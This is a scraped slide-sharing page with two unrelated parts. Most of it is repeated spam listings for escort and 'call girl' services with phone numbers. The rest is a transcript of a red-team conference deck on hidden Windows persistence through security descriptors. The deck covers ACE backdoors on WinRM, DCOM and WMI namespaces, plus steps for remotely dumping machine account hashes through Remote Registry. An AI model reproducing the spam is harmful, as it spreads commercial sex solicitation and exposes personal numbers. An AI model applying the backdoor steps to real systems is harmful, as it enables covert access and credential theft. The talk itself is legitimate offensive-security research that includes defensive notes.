Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
soniya singh
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Delhi Call girls
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
gwenoracqe6
 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
SUHANI PANDEY
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Sheetaleventcompany
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
imonikaupta
 

Dernier (20)

Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
 
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
 
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
 

An ACE in the Hole - Stealthy Host Persistence via Security Descriptors

  • 1. An ACE in the Hole Stealthy Host Persistence via Security Descriptors
  • 2. Who We Are × @tifkin_ / @enigma0x3 / @harmj0y × Red teamers/researchers at SpecterOps × Code on code on code × Cons on cons on cons 2
  • 3. What This Is × Offensive applications × Intro to securable objects × Our Research Process × Securable object takeover primitives × Case studies/demos × Defense 3
  • 5. “As an offensive researcher, if you can dream it, someone has likely already done it...and that someone isn’t the kind of person who speaks at security cons” 5 Matt “f’ing” Graeber BlackHat 2015
  • 6. 6
  • 7. 7
  • 8. Why Care (really)? × It’s often difficult to determine whether a specific security descriptor misconfiguration was set maliciously or configured by accident × These changes also have a minimal different forensic footprint and grant: × Bug longevity! Privesc! Persistence! × They might already be on your system ;) × Living off the land++ (existed since NT was born!) 8
  • 9. Big Point(s) × Most defenders are not aware of this general persistence approach, much less how to find and remediate it! × You don’t need to leave malicious code/logic on a system to regain access! × What if this change was made to an organization’s “gold image”? 9
  • 10. Responsibly Evil ;) × Also, you don’t need to set the principal/trustee (who has the rights) to S-1-1-0! × Security descriptor backdoors can be set for specific trustees in a targeted manner so exposure in the environment is minimized 10
  • 11. ¯_(ツ)_/¯ × “if an attacker has code execution on your system, you’re screwed already, so who cares“ × “You need admin rights to do this, this is stupid!“ × To this we say: domain joined boxes != isolated home systems × we guess the defensive industry should just pack up and leave… 11
  • 13. What is a “Securable Object”? A windows object that can have a security descriptor
  • 16. Where are these descriptors? × Found in the registry, the file system, in the kernel, ntds.dit.... × Really depends on the type of object × Finding what objects are securable, much less exactly where their descriptors are located, isn’t as easy as you’d think... 16
  • 17. From DACLs to SACLs 17 × Access Control List (ACL) is basically shorthand for the DACL/SACL superset × An object’s Discretionary Access Control List (DACL) and Security Access Control List (SACL) are ordered collections of Access Control Entries (ACEs) × DACL - What principals/trustees have what rights over the object × The SACL - Specifies how to audit access to the object
  • 19. More on DACLs 19 × Null DACL != no DACL × Inheritance… can be a >_< × General interpretation: × Explicit Deny × Explicit Allow × Inherited Deny × Inherited Allow
  • 21. Our Research Approach Objects accessible from user-mode with a focus on one's usable for persistence/lateral movement 1. Discover securable object 1. Offline and Online Security Descriptors Enumeration 1. Analyze Access mask a. What object-specific rights are there (if any)? b. What rights permit persistence/lateral movement? 1. Operational Weaponization and Detection 21
  • 22. 1. Discovering Securable Objects × Windows documentation lists about 20-30 securable objects* × We’ve identified 70+! (There’s *many* more) × Microsoft Protocol Specifications × Very useful for RPC servers × Find-RegistrySecurityDescriptors.ps1 22*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379557(v=vs.85).aspx
  • 24. 2. Online vs Offline Security Descriptors × Where do objects get their security descriptor? × Offline - Security descriptor derived from registry, file, ntds.dit, etc. × Online - Security descriptor is in memory Our approach to enumeration: × Locally as an unprivileged user × Locally as a privileged user × Remotely as an unprivileged user × Remotely as a privileged user 24
  • 25. Existing Tooling × Use existing tools × Accesschk.exe × WindowsDACLEnumProject × Google’s sandbox analysis tools × NtObjectManager woot woot! × BloodHound × Most do not distinguish between online/offline security descriptors × Implication: How do you know if an object has been modified after creation? 25
  • 26. Enumeration Caveats × “Online” vs offline security descriptors × Necessary token privileges × Some objects are “invisible” to user-mode enumeration × Kernel private namespaces × Does an object with no name have a security descriptor? × https://googleprojectzero.blogspot.co.uk/2014/10/did-man-with-no-name-feel- insecure.html 26
  • 27. 3. Access Mask Analysis Taking back what’s yours ;) 27
  • 28. Deriving Access Mask Meaning × MSDN Documentation × Technical Specifications × Reversing × Trial and error ¯_(ツ)_/¯ 28
  • 29. Generic Object Takeover Primitives × Attacker is owner (implies WRITE_DAC) × Attacker has WRITE_DAC/WRITE_OWNER × Attacks has STANDARD_RIGHTS_ALL × Attacker has GENERIC_ALL* × Object has NULL security descriptor (implies Everyone has GENERIC_ALL) 29 Depends on how the object maps the generic right to standard/object-specific rights. Usually this includes WRITE_DAC/WRITE_OWNER, but doesn’t have to
  • 30. Object-specific Takeover Primitives × Each securable object can define its own rights × Example: Process Rights × PROCESS_CREATE_PROCESS × PROCESS_CREATE_THREAD × PROCESS_SUSPEND_RESUME × PROCESS_QUERY_INFORMATION × PROCESS_TERMINATE × The specific object and its rights determine its offensive usefulness (priv esc, lateral movement, persistence, etc.) 30
  • 32. Service Control Manager RPC Server × “RPC server that enables service configuration and control of service programs.” - MS-SCMR × Applicable Securable Objects × Service Control Manager Server × Windows Services 32
  • 33. SCM Server Applicable Rights 33 SC_MANAGER_CONNECT Permits connecting to service SC_MANAGER_CREATE_SERVICE Ability to add a new service SC_MANAGER_ENUMERATE_SERVICE List out services By default, unauthenticated users can enumerate the security descriptor of the SCM Server!
  • 35. WinRM/WinRS × Windows Remote Management/Windows Remote Shell × Provides the ability to remotely interface with a host × Think PowerShell Remoting × Create backdoored ACE and apply it to either the WinRM or WinRS DACL × Or both!! × Defined user (via SID) will be able to remotely interact with the host without admin privs 35
  • 36. WinRM/WinRS × Security Descriptor can be accessed by pulling the SecurityDescriptorSDDL property of Get- PSSessionConfiguration × Build the new DACL via DiscretionaryAcl.AddAccess() of Security.AccessControl.CommonSecurityDescriptor × PowerShell Remoting: × Set the new DACL via -SecurityDescriptorSddl of Set-PSSessionConfiguration × WinRS × Set WSMan:localhostServiceRootSDDL to the new DACL via Set-Item 36
  • 37. WinRM/WinRS × Already weaponized here: https://github.com/ssOleg/Useful_code/blo b/master/Set-RemoteShellAccess.ps1 × In 2014…. × Takes a domain SID and adds an ACE for that SID to both PowerShell Remoting and WinRS DACLs × Allows that specific user/group to remotely interface with WinRM/WinRS without having any additional privilege 37
  • 38. DCOM × Distributed Component Object Model × Been around since 1996… >_< × Secured via Launch and Activation Permissions × Local/Remote, perms reside in the registry × Can you use interesting DCOM applications to get code-execution? × Applications with “ExecuteShellCommand()” × Backdoor your favorite DCOM application for a specific user/group’s SID :-) 38
  • 39. DCOM × Access is determined via machine-wide permissions first and then application specific permissions × Add target user/group to allow machine-wide Remote Activation/Launch Permissions × Instead of editing the Default, just edit the Limit × HKLM:SoftwaremicrosoftoleMachineLaunchRestriction × A;;CCRPLC;;;$SID × Backdoor a specific DCOM Application for a domain user/group × HKLM:SoftwareClassesAppID{GUID}LaunchPermission × HKLM:SoftwareClassesAppID{GUID}AccessPermission × Requires: SeTakeOwnershipPrivilege, SeRestorePrivilege, SeSecurityPrivilege if installing locally 39
  • 42. WMI NameSpaces × Contains a collection of WMI classes that host various methods/properties × Each namespace has associated DACLs × Windows checks the DCOM machine-wide launch permissions for the first stage of access × If successful, the DACLs on the WMI namespace are then checked × Backdoor a NameSpace that contains a class with a useful method × Create() method of Win32_Process, for example 42
  • 43. WMI NameSpaces × Call GetSecurityDescriptor() on the target WMI namespace (local requires SeSecurityPrivilege) × Use Win32_Ace to set our Access Mask and flags × Use Win32_Trustee to assign the user × Set the “Trustee” property of Win32_Ace to our Win32_Trustee object × Add our new ACE to the target namespace DACL: $NameSpaceACL.DACL += $Ace.PSObject.ImmediateBaseObject × Call SetSecurityDescriptor() with the newly updated NameSpace object to set it 43
  • 46. × Securable Objects a. Printer Servers HKLMSYSTEMCurrentControlSetControl PrintServerSecurityDescriptor a. Printer Objects HKEY_LOCAL_MACHINESOFTWAREMicrosoft Windows NTCurrentVersionPrintPrinters Security a. Print Jobs - Not very interesting offensively Specifications: MS-RPRN, MS-PAR, MS-PAN, MS-PRSOD 46 Printers
  • 51. Remote Registry × Allows permitted users/groups to access the registry remotely via .NET/Win32 API × [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey() × The RemoteRegistry service has to be enabled and the calling user has to have access × By default in Windows 7/10, this service is disabled × Remote access to the registry == ability to dump hashes (among other things) 😈 51
  • 52. Remote Registry × Imagine this scenario: Remotely dumping an endpoint’s machine account hash as an unprivileged user × Remotely backdoor the winreg key for a specified user/group × Located at HKLM:SYSTEMCurrentControlSetControl SecurePipeServerswinreg × The DACL on this key decides who is allowed to connect via remote registry 52
  • 53. Remote Registry × Can be accomplished via WMI’s StdRegProv provider × Call SetSecurityDescriptor() with an ACE that defines the user/permissions for the backdoor × Why not just use StdRegProv? × Dumping the machine account hash requires obtaining various Registry Key classes. × Can only be obtained via RegQueryInfoKey() × Use Set-Service to remotely set the service StartupType to “Manual” × Set-Service -Name "RemoteRegistry" -ComputerName $Computer -StartupType "Manual" 53
  • 54. Remote Registry × Remotely take ownership of the SECURITY registry hive and add an ACE to the DACL for the backdoor user × As that user, remotely call RegConnectRegistry() × Open the required keys and pull the Key’s Class × SYSTEMCurrentControlSetControlLsa<JD,Skew1,GBG,DATA> × RegOpenKeyEx(), RegQueryInfoKey() × Combine these Class values and compute the BootKey × Use the BootKey to decrypt the LSA key × Use the LSA key to decrypt the machine account hash 54
  • 58. × A system access control list × “Enables administrators to log attempts to access a secured object” × Not used as extensively as they should be! SACLs: the other ACL 58
  • 59. Defensive Enumeration × More research is needed- you can’t defend against what you aren’t aware of! × Defensive PowerUp++ ? Operational test framework for the detection of backdoor scenarios? × Integration into BloodHound? 59
  • 60. Takeaways × The host-control graph is *MUCH* bigger than “is member of local admin group” × What is the real attack surface of a Windows host? × Many “forgotten” or unexplored RPC/DCOM servers × Many other securable objects we haven’t looked at 60
  • 61. 61
  • 62. × Implications of other securable objects × Real-time analysis × Enumeration of objects visible only to the kernel × Chaining host + AD security descriptor abuse Takeaways & Future Work 62
  • 63. Thanks! Any questions? @tifkin_ / @enigma0x3 / @harmj0y https://specterops.io/ 63